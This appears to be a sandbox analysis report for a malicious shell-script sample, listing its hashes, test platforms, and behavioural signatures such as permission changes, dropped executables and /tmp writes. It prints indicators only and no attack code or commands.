Analysis
-
max time kernel
78s -
max time network
79s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
-
Size
10KB
-
MD5
eeab4766daa60dbedfe5ac8ed6379d9b
-
SHA1
9bc333ca6165533554a6ae360550dd5b28050e51
-
SHA256
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad
-
SHA512
9e67b335a4b29e5381bbba0e4b024f17164814614713df6763b598063707277000f155eb47bcdd5ce7c785eaf790fffe084134540be358aa1bea4ce7fadc518c
-
SSDEEP
192:N5pZuLnRjPMfpMnOWrt609vuOZKu6j6MOWrt609uOZKuiJpZuLnIbjPMF:NkjPMfpMnOWrw09vuOZKu6j6MOWrw09z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97